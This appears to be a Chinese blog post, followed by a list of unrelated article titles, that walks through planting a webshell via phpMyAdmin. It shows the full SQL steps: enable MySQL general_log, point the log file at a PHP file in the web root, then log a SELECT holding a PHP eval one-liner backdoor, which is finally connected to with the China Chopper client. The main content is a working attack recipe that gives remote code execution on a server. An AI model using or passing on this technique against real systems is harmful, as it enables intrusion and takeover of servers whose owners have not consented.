通过phpMyAdmin拿webshell
2024-08-30 19:47:27
general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句
所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell
进入phpMyAdmin后在SQL处执行SQL语句
首先查看general log是否开启
show variables like 'general_log';
general log是关闭状态,执行SQL语句开启general log
set global general_log=on;
开启成功
然后把general_log_file设置为shell的绝对路径
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/x.php';
创建的x.php里的内容
然后执行SQL查询语句
SELECT '<?php @eval($_POST["x"]);?>';
执行成功
看一下x.php里的内容
成功插入了一句话木马
用菜刀连接,看看是否能够解析的
连接成功
最新文章
- How to remove null value in json string
- 2016 Multi-University Training Contest 2 D. Differencia
- STL学习
- 一个.xib界面文件中设计有多个View
- nodejs 安装及部署遇到的问题
- Linux内存管理原理【转】
- 秀才每天一篇之—SEO是什么?
- 创建对象时引用的关键字,assign,copy,retain
- eclipse for mac 快捷键
- Web 开发模式演变历史和趋势
- 深入分析JavaWeb技术内幕(修订版)》【PDF】下载
- Linkin大话PC常用快捷键
- OpenCV角点检测源代码分析(Harris和ShiTomasi角点)
- 吴恩达机器学习笔记54-开发与评价一个异常检测系统及其与监督学习的对比(Developing and Evaluating an Anomaly Detection System and the Comparison to Supervised Learning)
- CI框架简单使用
- 清空Sql server日志
- Java编程基础篇第一章
- rsync简介与rsync+inotify配置实时同步数据
- 3-安装hive
- vue2.0细节剖析
热门文章
- [转载]Google Android开发精华教程
- mvn 用指定setting.xml 执行指定pom.xml
- 【转】Pearson,Spearman,Kendall相关系数的具体分析
- sp_rename sqlserver 表 列 索引 类型重命名
- spring boot: 组合注解与元注解
- 使用Spring MVC表单标(转)
- JedisPool的配置参数整理
- @angular/cli项目构建--modal
- AOE网络——求关键路径
- Mac安装SSHFS挂载远程服务器上的文件夹到本地